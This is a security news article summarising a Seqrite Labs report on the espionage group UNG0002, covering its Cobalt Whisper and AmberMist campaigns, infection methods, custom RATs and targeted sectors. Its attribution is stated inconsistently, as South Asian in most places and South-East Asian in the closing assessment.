UNG0002: Stealthy South Asian APT Group Unleashes New Malware in Cyber Espionage Campaigns Across Asia

The Seqrite Labs APT-Team has uncovered the latest espionage operations of UNG0002 (Unknown Group 0002), a stealthy South Asian threat actor conducting multi-stage cyber campaigns across China, Hong Kong, Pakistan, and other Asian jurisdictions. With advanced social engineering tactics and sophisticated malware implants, UNG0002 has demonstrated adaptability and technical finesse in a string of operations tracked since 2024.

Seqrite researchers have grouped UNG0002’s activity under two major campaigns:

• Operation Cobalt Whisper (May–Sept 2024): Targeted defense, electrotechnical engineering, and civil aviation sectors with 20 observed infection chains.
• Operation AmberMist (Jan–May 2025): Expanded to gaming, academia, and software development, leveraging new malware implants like Shadow RAT, INET RAT, and Blister DLL.

“The more recent Operation AmberMist campaign has evolved to target gaming, software development, and academic institutions with improved lightweight implants,” the report disclosures.

UNG0002 favors complex, multi-stage infection techniques. Typical payloads are delivered using:

• Malicious LNK files (Windows shortcuts)
• VBScript, batch files, and PowerShell
• DLL sideloading via legitimate applications such as Rasphone.exe and Node-Webkit

“UNG0002 employs sophisticated infection chains using malicious LNK files, VBScript, batch scripts, and PowerShell to deploy custom RAT implants,” the report explains.

In one campaign, the group deployed the ClickFix Technique—a fake CAPTCHA verification trick—to lure victims into executing embedded PowerShell malware.

“The group utilizes fake CAPTCHA verification pages to trick victims into executing malicious PowerShell scripts, notably spoofing Pakistan’s Ministry of Maritime Affairs website,” the report writes.

UNG0002 makes clever use of CV-themed decoy documents, designed to impersonate game developers and students from elite universities. These documents trigger malware that implants one of several custom-built RATs:

• Shadow RAT
• INET RAT
• Blister DLL

Notably, researchers uncovered PDB (Program Database) paths embedded in the malware:

• Shadow RAT: mustang.pdb
• INET RAT: memcom.pdb

These internal identifiers may point to internal codenames like “Mustang” and “ShockWave.”

“Notable technical artifacts include PDB paths revealing development environments… indicating potential code names ‘Mustang’ and ‘ShockWave’.”

The group’s scope is wide-ranging:

• Defense & aerospace
• Electrotechnical engineering
• Energy and civil aviation
• Software development
• Gaming industry
• Academia and medical institutions
• Cybersecurity researchers

Despite using sophisticated evasive techniques, the group maintains a consistent command-and-control infrastructure, following repeated naming conventions. This consistency helps analysts link infections across campaigns.

Seqrite assesses with high confidence that UNG0002 originates from South-East Asia, and the campaigns are espionage-focused—primarily gathering intelligence across sectors.

Related Posts:

• Kaspersky Lab Exposes TTPs of Asian Cyber Espionage Groups
• Doctors warn that medical implants may be the hacker’s future goals
• China-Linked Phishing Campaign Exploits Geopolitical Tensions, Ravages Asian Finance Sector
• Interpol & Asian Agencies Dismantle Major Malware Infrastructure: 20,000 Malicious IPs Blocked
• Silent Lynx APT Group: A New Espionage Threat Targeting Central Asia